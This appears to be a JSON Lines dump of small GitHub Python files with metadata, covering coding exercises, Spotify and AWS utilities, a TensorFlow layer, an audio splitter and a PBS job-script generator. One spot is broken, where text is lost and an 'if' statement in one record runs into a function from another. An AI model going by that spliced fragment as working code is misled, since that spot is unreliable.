lengths\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n sticks = list(map(int, input().rstrip().split()))\n\n result = maximumPerimeterTriangle(sticks)\n\n fptr.write(' '.join(map(str, result)))\n fptr.write('\\n')\n\n fptr.close()\n","repo_name":"polotto/HackerRank","sub_path":"other-problems/maximum-perimeter-triangle/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"38469082740","text":"if __name__ == '__main__':\n print(\"*** Fun with Drawing ***\")\n n=int(input(\"Enter input : \"))\n inverse=bool(0)\n tri=int(1)\n for j in range((n-1)*4+1):\n for i in range ((n-1)*4+1):\n if i None:\n # Make sure the dirs in the filepath exist, create if needed\n os.makedirs(os.path.dirname(output_filename), exist_ok=True)\n\n sorted_list = sorted(list(data.values()), key=sort_lambda)\n output_rows = [header_row]\n for item in sorted_list:\n output_rows.append(item_to_row_lambda(item))\n\n with open(output_filename, \"wt\") as out_file:\n tsv_writer = csv.writer(out_file, delimiter=\"\\t\")\n tsv_writer.writerows(output_rows)\n\n\ndef track_to_row(item) -> list:\n track_obj = item[\"track\"]\n return [\n track_obj[\"name\"],\n \", \".join(map(lambda artist: artist[\"name\"], track_obj[\"artists\"])),\n track_obj[\"album\"][\"name\"],\n item[\"added_at\"],\n track_obj[\"id\"],\n ]\n\ndef playlist_track_to_row(item) -> list:\n track_row = track_to_row(item)\n added_by_id = item[\"added_by\"][\"id\"]\n if added_by_id == '':\n # This has come up in debugging with Spotify owned (\"official\") playlists,\n # presumably because they're built different than \"regular\" playlists\n added_by_id = \"\"\n return [*track_row[:-1], item[\"added_by\"][\"id\"], *track_row[-1:]]\n\n\ndef album_to_row(item) -> list:\n album_obj = item[\"album\"]\n return [\n album_obj[\"name\"],\n \", \".join(map(lambda artist: artist[\"name\"], album_obj[\"artists\"])),\n item[\"added_at\"],\n album_obj[\"id\"],\n ]\n\n\ndef playlist_to_row(item) -> list:\n return [\n item[\"name\"],\n item[\"description\"],\n item[\"tracks\"][\"total\"],\n item[\"owner\"][\"id\"],\n item[\"collaborative\"],\n item[\"id\"],\n ]\n","repo_name":"riggspc/spotify-version-snapshots","sub_path":"utils/outputfileutils.py","file_name":"outputfileutils.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"36462081814","text":"\"\"\"\nFunctions to convert timestamps\n==============================\n\n\"\"\"\n\nfrom __future__ import print_function\nimport time\nimport datetime\nimport numpy as np\nfrom datetime import datetime as dt\nfrom datetime import timedelta\nimport pandas as pd\n\ndef date2datenum(d):\n ## Convert python datetime to Matlab datenum\n ##: input: Date as python datetime object\n ##: return: corresponding datenum\n return 366 + d.toordinal() + (d - dt.fromordinal(d.toordinal())).total_seconds()/(24*60*60)\n\ndef datenum2date(datenum):\n ##Convert Matlab datenum into Python datetime.\n ##:input datenum Date in datenum format\n ##:return:Datetime object corresponding to datenum.\n d=np.array(datenum)\n return pd.to_datetime(d-719529,unit='D')\n\n\ndef calcTime_Mat2DOY(matlab_time):\n #### EXAMPLE OF USE:\n #### pytime = calcTime_Mat2DOY(matlab_time)\n\n print ('Converting MATLAB timesteps to DOY:')\n\n timestamps = pd.to_datetime(matlab_time-719529, unit='D')\n python_time = timestamps.dayofyear + (timestamps.hour / 24.0) + (timestamps.minute / 1440.0) + (timestamps.second / 86400.0)\n\n return python_time\n\ndef calcTime_Date2DOY(date):\n #### date should be forematted as YYYYmmDD\n\n print ('Converting date to DOY:')\n\n mm = date[4:6] #### month\n DD = date[6:8] #### day\n refDateAug = 226 #### Aug reference date for drift: 14th Aug 2018\n refDateSep = 243 #### Sep reference date for drift: 1st Sep 2018\n\n if mm == '08':\n doy = (float(DD) - 14.0) + refDateAug\n elif mm == '09':\n doy = float(DD) + refDateSep\n else:\n print ('****Date not valid with this function****')\n\n print ('----')\n print ('Date = ', date)\n print ('DOY = ', doy)\n print ('')\n\n return doy\n","repo_name":"JuVue/PYTHON","sub_path":"py_functions/time_functions.py","file_name":"time_functions.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"25680513514","text":"from ..layer_operation import LayerOperation\r\nimport tensorflow as tf\r\nimport re\r\nfrom initializer import get_initializer\r\nfrom regularizer import get_regularizer\r\n\r\n# WARNING: Only 2D convolution available\r\nclass op_tf_conv(LayerOperation):\r\n\r\n _attributes = \"\"\"[]\"\"\" # TODO: TO BE DEPRECATED\r\n\r\n def compile_time_operation(self, learning_option, cluster):\r\n pass\r\n\r\n def run_time_operation(self, learning_option, cluster):\r\n \"\"\"\r\n define convolution operation for input tensor\r\n outputs:\r\n output: convolution output\r\n \"\"\"\r\n # get input\r\n input_ = self.get_input('input')\r\n indim = self.get_dimension('input')\r\n\r\n # get attr\r\n # required field\r\n kernel_size = self.get_attr('kernel_size', default=None)\r\n if kernel_size is None:\r\n raise Exception('[DLMDL ERROR]: {0} in {1} layer must be declared.'.format('kernel_size', self.name))\r\n num_output = self.get_attr('num_output', default=None)\r\n if num_output is None:\r\n raise Exception('[DLMDL ERROR]: {0} in {1} layer must be declared.'.format('num_output', self.name))\r\n\r\n # optional field\r\n padding = self.get_attr('padding', default='VALID')\r\n stride = self.get_attr('stride', default=1)\r\n bias_term = self.get_attr('bias_term', default=True)\r\n initializer = self.get_attr('initializer', default={'weight': {}, 'bias':{}}) # default will set later\r\n regularizer = self.get_attr('regularizer', default={}) # default will set later\r\n dilate = self.get_attr('dilate', default=None)\r\n scope = self.get_attr('scope', default='default')\r\n\r\n # get worker info: worker num, device type, device num\r\n device = self.get_attr('device')\r\n num = re.sub('[^0-9]', '', cluster.get('types')[device])\r\n type = cluster.get('types')[device].replace(str(num), '')\r\n\r\n # get shape array\r\n stride_shape = [stride, stride]\r\n weight_shape = [kernel_size[0], kernel_size[1], indim[3], num_output]\r\n dilate_shape = [dilate, dilate] if dilate is not None else None\r\n bias_shape = [num_output]\r\n\r\n\r\n with tf.variable_scope(self.name):\r\n # get weight for convolution\r\n with tf.variable_scope(scope):\r\n weight_init = get_initializer(initializer.get('weight'), is_bias=False)\r\n weight_reg = get_regularizer(regularizer, scope, is_bias=False)\r\n if learning_option.get(\"parallel\", None) == \"DP_mb\":\r\n with tf.device('/job:worker/task:{0}/mb:0'.format(device)):\r\n weights = tf.get_variable('weights', shape=weight_shape, dtype=tf.float32,\r\n initializer=weight_init, regularizer=weight_reg,\r\n trainable=True)\r\n else:\r\n weights = tf.get_variable('weights', shape=weight_shape, dtype=tf.float32,\r\n initializer=weight_init, regularizer=weight_reg,\r\n trainable=True)\r\n #tf.add_to_collection(scope, weights)\r\n\r\n if bias_term:\r\n bias_init = get_initializer(initializer.get('bias'), is_bias=True)\r\n bias_reg = get_regularizer(regularizer, scope, is_bias=True)\r\n if learning_option.get(\"parallel\", None) == \"DP_mb\":\r\n with tf.device('/job:worker/task:{0}/mb:0'.format(device)):\r\n biases = tf.get_variable('biases', shape=bias_shape, dtype=tf.float32,\r\n initializer=bias_init, regularizer=bias_reg,\r\n trainable=True)\r\n else:\r\n biases = tf.get_variable('biases', shape=bias_shape, dtype=tf.float32,\r\n initializer=bias_init, regularizer=bias_reg,\r\n trainable=True)\r\n #tf.add_to_collection(scope, biases)\r\n\r\n # construct API\r\n def apiConstructor():\r\n conv = tf.nn.convolution(input_, weights, padding,\r\n strides=stride_shape, dilation_rate=dilate_shape, data_format='NHWC')\r\n\r\n # if bias_term is True, add bias term to convolution output\r\n if bias_term:\r\n conv = tf.nn.bias_add(conv, biases, data_format='NHWC')\r\n\r\n # get output dimension\r\n outdim = list(conv.get_shape()[i].value for i in xrange(len(conv.get_shape())))\r\n\r\n # set output\r\n self.set_dimension('output', outdim)\r\n self.set_output('output', conv)\r\n\r\n # set tf summary\r\n tf.summary.histogram(self.name, conv)\r\n\r\n with tf.variable_scope(self.name):\r\n # single node, model parallelism: explicit worker mapping\r\n # data parallelism: equally duplicate model\r\n if learning_option.get(\"parallel\", None) != \"DP\":\r\n with tf.device('/job:worker/task:{0}/{1}:{2}'.format(device, type, num)):\r\n apiConstructor()\r\n else:\r\n apiConstructor()","repo_name":"KAIST-NCL/IDLE","sub_path":"src/DLMDL/LayerOperation/tf/conv.py","file_name":"conv.py","file_ext":"py","file_size_in_byte":5370,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"16717185996","text":"## CSV Data Munger/Cleaner/Shaper\n# Created by: Mitch Main\n# Created on: 9/25/14\n# Info: This imports a CSV file to be cleaned, allows you to define the number\n# of fields you would like to import, and then imports them from the file,\n# then it writes it to a cleaned file\n\n# Imports\nimport csv\nimport tkinter\nfrom tkinter.filedialog import askopenfilename\nfrom tkinter.filedialog import asksaveasfilename\nimport string\nimport itertools\nimport re\n\n\n\n## FUNCTION: GetFile()\n# The GetFile function gives the user a GUI interface to get the file directory\n# the function then returns a file directory as a string.\n# @input: From UI Dialog Box\n# @return str: filedir\n# @return int: collumn\n\ndef GetFile():\n filedir = askopenfilename(title='Open File')\n return filedir\n\n\n\n##FUNCTION: TxtWriter(fieldList, headerList)\n# TxtWriter writes the the field lists to the output file as a tab delimited file\n# for easy uploading to a SQL server or to be easily opend by Excel\n# @input List : fieldList\n# @input List : headerList\n# @return file: .txt file in saveas location\n\ndef TxtWriter(fieldList, headerList):\n\n #important variables\n writeList = []\n\n #get filename for writefile and open it\n filename = asksaveasfilename(title='Save As :', defaultextension='.txt')\n with open(filename, mode='w', newline = '') as wfile:\n writer = csv.writer(wfile, dialect='excel-tab')\n\n #write the headers\n if headerList:\n writer.writerow(headerList)\n\n #iterate over the 'rows'\n for row in range(len(fieldList[0])):\n #iterate over the 'collumns'\n for col in range(len(fieldList)):\n writeList.append(fieldList[col][row])\n #end for-loop\n writer.writerow(writeList)\n writeList.clear()\n #end for-loop\n #end with-block\n\n\n\n#FUNCTION: GetUserInput(prompt, errorMessage)\n# This is a helper function to get input and avoid repeating code\n# @input str: prompt\n# @input str: errorMessage\n# @return str: inputString\n\ndef GetUserInput(prompt, errorMessage, typeCheck):\n while True: #Can I say that, this while loop is not my code, and I hate its style. However, it works!\n if typeCheck == 'int':\n try:\n _input = int(input(prompt))\n except ValueError:\n print(errorMessage)\n continue\n else:\n print(\"Valid input\")\n break\n elif typeCheck == 'bool':\n try:\n _input = bool(input(prompt))\n except ValueError:\n print(errorMessage)\n continue\n else:\n print(\"Valid input\")\n break\n #end if-elif block\n #end while-loop\n\n return _input\n\n#FUNCTION: FieldImporter(filedir)\n# This functions grabs the fields by each line and stores them in the dynamic list\n# @input str : filedir\n# @return list: fieldList\n# @return list: headerList\n\ndef FieldImporter(filedir):\n\n #instantiations\n fieldLocations = []\n headerList = []\n\n #Get the number of fields to import\n howManyFields = GetUserInput('How many fields to import? ', 'Not an int', 'int')\n\n #Instantiate the main list\n fieldList = [[] for i in range(howManyFields)]\n\n #get field locations (will account for human counting later)\n print('Input the collumn numbers in the order you want them to appear in the output file')\n print('i.e. If you want the 5th collumn in the 1st collumn of the output list,')\n print('give me 5 as the first entry then list the rest as you like')\n for i in range(howManyFields):\n fieldLocations.append(GetUserInput('Collumn number of field to be imported', 'Thats not an integer', 'int'))\n #end for-loop\n \n #Get Headers\n hasHeaders = GetUserInput('Does your data have headers? (Use: True/False or 1/0)', 'Not a boolean value', 'bool')\n if hasHeaders:\n importHeaders = GetUserInput('Want to import your headers? (Use: True/False or 1/0)', 'Not a boolean value', 'bool')\n #end if-block\n\n if not importHeaders:\n makeHeaders = GetUserInput('Want to create headers for your data?\\nNote: Only make headers for the fields you will import')\n else:\n makeHeaders = False\n #end if-else\n\n if makeHeaders:\n for i in range(howManyFields):\n headerList.append(GetUserInput('Header name for field: ', 'Not an integer', 'int'))\n firstLine = GetUserInput('Which row is the first line of data (give line with the headers on it)', 'Not an interger', 'int')\n\n #open the file and start reading\n with open(filedir) as csvfile:\n reader = csv.reader(csvfile, dialect='excel')\n if importHeaders:\n headerLoop = True\n else:\n headerLoop = False\n for i in range(firstLine - 1): #skip the lines til the first line\n next(reader)\n for row in reader:\n if headerLoop:\n for i in range(howManyFields):\n headerList.append(row[fieldLocations[i] - 1])\n #end for-loop\n headerLoop = False\n else:\n for i in range(howManyFields):\n #use the fieldLocations and iterate through their locations and get them from the row iterable\n fieldList[i].append(row[fieldLocations[i] - 1]) #account for human counting\n #end for-loop\n #end if-else block\n #end for-loop\n #end with-block\n return fieldList, headerList\n\n \n\n# MAIN ALGORITHM\n\ndef main():\n\n filedir = GetFile()\n fieldList, headerList = FieldImporter(filedir)\n TxtWriter(fieldList, headerList)\n\n\n#RUN IT!!\n\nmain()\n \n","repo_name":"mmain10/Python-Scripts","sub_path":"CSV Data Shaper.py","file_name":"CSV Data Shaper.py","file_ext":"py","file_size_in_byte":5719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19681638623","text":"import os\nimport time\nimport gc\nimport modules.helpers as helpers\nfrom pydub import AudioSegment\nfrom tqdm import tqdm\n\nclass Splitter:\n\n\tdef __init__(self, path, chunklength, output_directory):\n\t\tself.path = path\n\t\tself.output_directory = output_directory\n\t\tself.chunklength = chunklength\n\n\tdef split_to_chunks(self, new_name):\n\n\t\t'''\n\t\ttakes an original file, and splits it into chunk size in new path.\n\n\t\tParameters:\n\t\tnew_name (str): a new filename without extension or path\n\n\t\tex: \"users\\\\file.mp3\" should be inserted as \"file\"\n\t\t'''\n\n\t\taudio_file = AudioSegment.from_mp3(self.path)\n\n\t\taudio_remaining = True\n\t\tbeg_segment = 0\n\n\t\tpbar = tqdm(total=len(audio_file))\n\n\t\twhile audio_remaining:\n\t\t\tend_segment = beg_segment + self.chunklength\n\n\t\t\t#if remaining audio is less than chunk size, export remaining length\n\t\t\tif end_segment > len(audio_file):\n\t\t\t\tremaining_audio = end_segment - len(audio_file)\n\t\t\t\tremaining_audio = remaining_audio * -1\n\t\t\t\tfull_segment = audio_file[remaining_audio:]\n\n\t\t\t\tnew_path = self.output_directory + \"\\\\\" + new_name\n\t\t\t\tnew_path = (new_path + \"_\" + str(helpers.convert_to_mins((beg_segment))) + \"-\" +\n\t\t\t\t\t\t\tstr(helpers.convert_to_mins(len(audio_file))) + \".mp3\")\n\n\t\t\t\tfull_segment.export(new_path, format=\"mp3\")\n\n\t\t\t\taudio_remaining = False #break\n\t\t\telse:\n\t\t\t\tfull_segment = audio_file[beg_segment:end_segment]\n\n\t\t\t\tnew_path = self.output_directory + \"\\\\\" + new_name\n\t\t\t\tnew_path = (new_path + \"_\" + str(helpers.convert_to_mins((beg_segment))) + \"-\" + \n\t\t\t\t\t\t\tstr(helpers.convert_to_mins((end_segment))) + \".mp3\")\n\n\t\t\t\tfull_segment.export(new_path, format=\"mp3\")\n\n\t\t\tstart = beg_segment\n\t\t\tbeg_segment += self.chunklength #iterate\n\n\t\t\t#using this instead of regular update to make it look nicer\n\t\t\thelpers.incriment_pbar(start, beg_segment, pbar)\n\n\t\tdel audio_file\n\t\tpbar.close()\n\t\tgc.collect()\n\ndef split_all(input_directory, files_list, chunklength, output_directory):\n\n\t'''\n\tuses split_to_chunks() to loop over all files in a list of files, and split them.\n\tDeletes all files in files_list when finished.\n\n\tParameters:\n\n\tinput_directory (str): path to input directory\n\n\tfiles_list (list of str): list of files converted (ex: filename.mp3) \n\t\t\t\t\t\t\t\tpassed from AudioConverter.convert_all()\n\n\tchunklength (int): length per file (in milliseconds)\n\n\toutput_directory (str): Output directory of split files.\n\n\t'''\n\n\tprint(\"\\n\\nSplitting files\\n\\n\")\t\n\ti = 1\n\n\tfor file in files_list:\n\n\t\tprint(\"splitting: {}, file {} of {}\".format(file, str(i), str(len(files_list))) )\n\n\t\tfull_path = input_directory + \"\\\\\" + file\n\t\tfile_to_split = Splitter(full_path, chunklength, output_directory)\n\n\t\tname_without_ext = file.split(\".mp3\")[0]\n\t\tfile_to_split.split_to_chunks(name_without_ext)\n\n\t\ti += 1\n\n\tdelete_files(input_directory, files_list)\n\ndef delete_files(path, files_list):\n\n\t'''\n\tDeletes all files from files_list in a given path (directory)\n\n\tParameters:\n path (str): directory of files to be deleted\n files_list: list of files to delete within given directory.\n\n\t'''\n\tfor file in files_list:\n\t\tfull_path = path + \"\\\\\" + file\n\t\tif os.path.exists(full_path):\n\t\t\tos.remove(full_path)\n\t\t\tprint(full_path + \" removed.\")\n\n\n","repo_name":"MeijiIshinIsLame/miaudio","sub_path":"miaudio/modules/splitter.py","file_name":"splitter.py","file_ext":"py","file_size_in_byte":3156,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"16599815954","text":"from sklearn.preprocessing import normalize\nimport pandas as pd\nfrom matplotlib.ticker import MultipleLocator\nfrom matplotlib import pyplot as plt\nfrom sklearn.model_selection import (\n cross_validate,\n cross_val_predict,\n)\nfrom matplotlib import ticker\nimport numpy as np\nimport seaborn as sns\n\nplt.rcParams[\"font.size\"] = 18\nfig = plt.figure()\n# from sklearn.svm import KNeighborsRegressor\nfrom sklearn.neighbors import KNeighborsRegressor\n\nresults = pd.read_csv(\"KNNoptimize\\knn遍历neighbourp.csv\")\n\n# show the first 5 rows\n\nxc = results[\"param_n_neighbors\"].to_numpy()\nye = results[\"param_p\"].to_numpy()\nresults[\"mean_test_score\"] = abs(results[\"mean_test_score\"])\nvm = abs(results[\"mean_test_score\"].to_numpy())\nprint(vm)\nresults = pd.DataFrame(\n results, columns=[\"param_n_neighbors\", \"param_p\", \"mean_test_score\"]\n)\n\nresults = results.pivot(\n index=\"param_n_neighbors\", columns=\"param_p\", values=\"mean_test_score\"\n)\nplot = sns.heatmap(results, cmap=\"viridis\").invert_yaxis()\nplt.xlabel(\"p\")\nplt.ylabel(\"n neighbour\")\nplt.savefig(\"KNNoptimize\\drawing.svg\")\n","repo_name":"sch401/bcbpd","sub_path":"3_different ML model traning and selection/KNN/drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71990070501","text":"import os\nimport sys\nimport yaml\n\nfrom shutil import copy\nfrom tabulate import tabulate\nclass ShellPath :\n '''\n Designate the position of shell scripts and \n check the shell scripts registered with gmd.\n '''\n def __init__(self) :\n self.shellpath = \"%s/shell\"%(os.path.split(os.path.dirname(__file__))[0])\n self.files = [f for f in os.listdir(self.shellpath)]\n\n def register_shell(self,shellpath):\n '''\n Save shell file\n '''\n if os.path.isfile(shellpath):\n filename = os.path.basename(shellpath)\n filepath = os.path.abspath(\"%s/%s\"%(self.shellpath,filename))\n if os.path.isfile(filepath):\n print(\"%s is already enrolled\\n\"%(filename))\n else :\n copy(shellpath,filepath)\n print(\"%s Successfully Save \"%(filepath))\n else :\n print(\"%s isn't file\"%(shellpath))\n\n def check(self):\n '''\n Check shell file registered \n '''\n shell = [] ; numberlist =[] ;number = 1\n for f in self.files :\n if f.split(\".\")[-1] == 'sh' :\n shell.append([number, f])\n numberlist.append(number)\n number += 1\n print(\"\\n\\n\",tabulate(shell, tablefmt='grid'),end='\\n\\n') \n return shell, numberlist\n\n def remove(self) :\n '''\n Remove the shell file registered\n '''\n shell, number = self.check()\n\n while True :\n r = int(input(\"Please enter the script name for removal >> \"))\n if r in number :\n break\n os.remove(\"{}/{}\".format(self.shellpath, shell[r-1][-1]))\n print(\"{} scirpt is deleted\".format(shell[r-1][-1]))\n\n def generateshell(self, shell) :\n \n # add function in 20220203\n if not os.path.isfile(shell['vasp_std']) :\n print(shell['vasp_std'],\"is not file\")\n sys.exit(1)\n elif not os.path.isfile(shell['vasp_ncl']):\n print(shell['vasp_ncl'],\"is not file\")\n sys.exit(1)\n elif not os.path.isfile(shell['vasp_gam']):\n print(shell['vasp_gam'],\"is not file\")\n sys.exit(1)\n # \n \n while True :\n regist = input(str(\"Please enter Y to register shell script, otherwise enter N >> \"))\n if regist == 'Y' :\n path = self.shellpath + \"/{}.sh\".format(shell['shell_name'])\n break\n elif regist == 'N' :\n path = \"{}.sh\".format(shell['shell_name'])\n break\n else :\n print(\"Please Enter Y or N\")\n\n with open(path,'w') as sh :\n sh.write(\"#!/bin/sh\\n\")\n sh.write(\"# control options #\\n\")\n sh.write(\"#PBS -N {} \\n\".format(shell['shell_name']))\n sh.write(\"#PBS -l nodes={}:ppn={}:{}\\n\".format(shell['node'],shell['ppn'],shell['node_name']))\n sh.write(\"########\\n\")\n sh.write(\"#PBS -q {}\\n\".format(shell['node_name']))\n sh.write(\"#PBS -o out.log\\n\")\n sh.write(\"#PBS -j oe\\n\")\n \n sh.write(\"\\n# PATH & EXE\\n\")\n sh.write(\"EXE='{}'\\n\".format(shell['vasp_std']))\n sh.write(\"#EXE='{}'\\n\".format(shell['vasp_ncl']))\n sh.write(\"#EXE='{}'\\n\".format(shell['vasp_gam']))\n \n sh.write(\"\\n#\\n\")\n sh.write(\"NUMBER=`cat $PBS_NODEFILE | wc -l`\\n\")\n sh.write(\"cd $PBS_O_WORKDIR\\n\")\n \n sh.write(\"\\n# run \\n\")\n sh.write(\"echo job started at `date` >> time\\n\")\n sh.write(\"{} -np $NUMBER -machinefile $PBS_NODEFILE $EXE > $PBS_JOBNAME.out\\n\".format(shell['mpi_command']))\n sh.write(\"echo job ended at `date` >> time\\n\")\n \n sh.close()","repo_name":"jgp505/perovgen","sub_path":"pygmd/shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"28142041021","text":"import boto3\nfrom boto3.session import Session\nfrom boto3.dynamodb.conditions import Key, Attr\nimport os\nimport pickle\nfrom io import BytesIO\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder, LabelEncoder, LabelBinarizer,MultiLabelBinarizer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.model_selection import train_test_split, GridSearchCV, KFold\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import svm\nfrom sklearn.model_selection import cross_val_score,StratifiedKFold, cross_validate\nfrom sklearn.metrics import classification_report, f1_score, accuracy_score, precision_score, recall_score, roc_auc_score\nfrom sklearn.decomposition import PCA\nfrom sklearn.base import BaseEstimator, TransformerMixin\nimport pandas as pd\nimport DynamoDBClient\n\ndynamodb = boto3.resource('dynamodb')\nclient = boto3.client('dynamodb', region_name='eu-west-2')\ns3 = boto3.resource('s3')\n\nACCESS_KEY = os.environ['AWS_ACCESS_KEY_ID']\nSECRET_KEY = os.environ['AWS_SECRET_ACCESS_KEY']\nAWS_DEFAULT_REGION = os.environ['AWS_DEFAULT_REGION']\n\n\nclass ML():\n\n def __init__(self):\n\n with BytesIO() as data:\n s3.Bucket(\"artificial-demo\").download_fileobj(\"xgb.pkl\", data)\n data.seek(0) # move back to the beginning after writing\n self.xgb = pickle.load(data)\n \n db = DynamoDBClient.DynamoDB(db_name = \"customer\")\n self.data = pd.DataFrame(db.get_all_items())\n\n print(\"----------------------------------------\")\n print(self.data.tail(1))\n \n def predict(self):\n\n\n y_pred=self.xgb.predict([self.X[-1]])\n y_proba=self.xgb.predict_proba([self.X[-1]])\n print(y_pred)\n print(y_proba)\n\n return y_pred,y_proba\n \n def pre_process(self, data):\n print(\"####### PRE-PROCESSING ###########\")\n #Numeric Features\n numeric_features= list(data.columns[data.dtypes == 'int64'])\n scaler = StandardScaler()\n scaled_data = scaler.fit_transform(data[numeric_features])\n scaled_data = pd.DataFrame(data=scaled_data, columns=numeric_features)\n\n #Binary Features\n binary_features = [\"default\", \"housing\", \"loan\", \"y\"]\n lb = BinaryTransformer()\n binarised_features = lb.fit_transform(data[binary_features])\n\n # Multioutput Features\n categorical_features = list(set(list(data.columns[data.dtypes == 'object'])) - set(binarised_features))\n ohe_data = pd.get_dummies(data[categorical_features])\n new_categorical_features = ohe_data.columns\n\n cleaned_data = pd.concat([scaled_data, binarised_features, ohe_data], axis=1)\n\n \n self.X = cleaned_data.drop('y', axis=1)\n self.y = cleaned_data['y']\n \n print(\"####### REEEE ###########\")\n print(self.X.shape)\n\n pca = PCA(n_components=32)\n self.X = pca.fit_transform(self.X)\n print(self.X.shape)\n\n self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(self.X, self.y, test_size=0.2, stratify=self.y)\n\n\n\nclass BinaryTransformer( BaseEstimator, TransformerMixin ):\n #Class Constructor \n def __init__(self):\n pass\n \n #Return self nothing else to do here \n def fit( self, X, y = None ):\n return self \n \n #Method that describes what we need this transformer to do\n def transform( self, X, y = None ):\n self.columns = list(X.columns)\n result = X.copy()\n for c in result.columns:\n result[c] = result[c].apply(lambda x: 1 if x==\"yes\" else 0)\n \n return result","repo_name":"lok63/artificial_serverless","sub_path":"machine_learning.py","file_name":"machine_learning.py","file_ext":"py","file_size_in_byte":3643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25432613834","text":"from datetime import datetime\r\nfrom aws_wrappers import AWS_Wrappers\r\nfrom utility import Utility\r\nutility = Utility()\r\naws_wrappers =AWS_Wrappers()\r\n\r\ndef test_ScheduledActions(ASGName): #TestCase B: Point 1: Find the Scheduled actions of given ASG which is going to run next and calcalate elapsed in hh:mm:ss from current time.\r\n try:\r\n scheduled_action_details = aws_wrappers.get_scheduled_actions(ASGName) # Get the sheduled actions of ASG\r\n scheduled_actions_list = scheduled_action_details.scheduled_update_group_actions #List of Scheduled of scheduled actions\r\n if len(scheduled_actions_list) == 0:\r\n print(\"No Scheduled Actions found\")\r\n assert False\r\n\r\n scheduled_action_recurrence={}\r\n try:\r\n for scheduled_action in scheduled_actions_list:\r\n # Get the next running time from Cron Expression and get the time delta between now and cron expression time\r\n scheduled_action_recurrence[scheduled_action.scheduled_action_name] = (utility.get_next_schedule_from_cron(scheduled_action.recurrence)-datetime.now()).total_seconds()\r\n\r\n next_running_job= min(scheduled_action_recurrence, key=scheduled_action_recurrence.get) # Get the minimum time of jobs which is nothing but latest job to run\r\n print(\"Job to Run Next : \" + next_running_job)\r\n except KeyError:\r\n pass ## if job is non recurring\r\n try:\r\n ## To find elapsed time from now from previous ran all jobs\r\n for scheduled_action in scheduled_actions_list:\r\n action_name= scheduled_action.scheduled_action_name # Get all action name list\r\n time_elapsed = datetime.now() - utility.get_previous_schedule_from_cron(scheduled_action.recurrence) # Get time of previous run from Cron\r\n print(\"Time Elapsed: \" + action_name + \" \"+str(time_elapsed)) ## prints elapsed time in hh:mm:ss\r\n assert True\r\n except KeyError:\r\n pass ## if job is non recurring\r\n except Exception as e:\r\n assert False\r\n\r\ndef test_ScalingDayActivity(ASGName):\r\n try:\r\n scaling_activities = aws_wrappers.describe_scaling_activities(ASGName) # Get all scaling activities result\r\n today_activities= []\r\n for activities in scaling_activities:\r\n for act in activities:\r\n start_date = act['StartTime'].date() # get the start time of the instance\r\n status = act['StatusCode']\r\n if start_date == datetime.now().date() and status == 'Successful': # Get the activities of today wich are success\r\n today_activities.append(act['ActivityId'])\r\n if len(today_activities)==0:\r\n print(\"No instances Launched or Terminated today\")\r\n assert False\r\n else:\r\n print (str(len(today_activities))+ \" instances launched or terminated today\")\r\n assert True\r\n except Exception as e:\r\n print(str(e))\r\n assert False\r\n\r\n\r\n","repo_name":"csegourab6/livevox-assignment-task-1","sub_path":"test_ScheduledActions.py","file_name":"test_ScheduledActions.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"75249470180","text":"import random\r\nfrom typing import ParamSpecArgs\r\ndef get_choices():\r\n player_choice=input(\"Choose your choice in(stone,paper,sessor)\")\r\n option=[\"rock\",\"paper\",\"sissor\"]\r\n computer_choice=random.choice(option)\r\n choices={\"player\":player_choice,\"computer\":computer_choice}\r\n return choices\r\ndef dj(player,computer):\r\n print(f\"you choose {player} computer choose {computer}\")\r\n if player==computer:\r\n return \"draw\"\r\n elif player==\"rock\":\r\n if computer==\"paper\":\r\n return \"paper will cover the rock and You lost\"\r\n else:\r\n return \"rock will cut the sissor and You win\"\r\n elif player==\"sissor\":\r\n \r\n if computer==\"paper\":\r\n return \"sissor will cut the paper,You Win\"\r\n else:\r\n return \"rock will broke the sissor,You lost\"\r\n\r\n elif player==\"paper\":\r\n if computer==\"sissor\":\r\n return \"sissor will cut the paper,you lost\"\r\n else:\r\n return \"paper will cover the stone ,you win\"\r\na=get_choices()\r\nresult=dj(a[\"player\"],a[\"computer\"])\r\nprint(result)\r\n","repo_name":"shanmugapandiyan/python-basics","sub_path":"python_simple_game.py","file_name":"python_simple_game.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23297862150","text":"s = [\"Franta\", \"Pepa\", \"Vašek\", \"Ignác\"]\r\n\r\n\r\ndef od1():\r\n global s\r\n s.append(input(\"napiš další jméno\"))\r\n otazka()\r\n\r\n\r\ndef od2():\r\n global s\r\n print(s)\r\n s.remove(input(\"napis jmeno\"))\r\n otazka()\r\n\r\n\r\ndef od3():\r\n global s\r\n print(s)\r\n otazka()\r\n\r\n\r\ndef od4():\r\n global s\r\n print(\"v seznamu je\", len(s), \"jmen\")\r\n otazka()\r\n\r\n\r\ndef od5():\r\n global s\r\n s.sort()\r\n print(s)\r\n otazka()\r\n\r\n\r\ndef 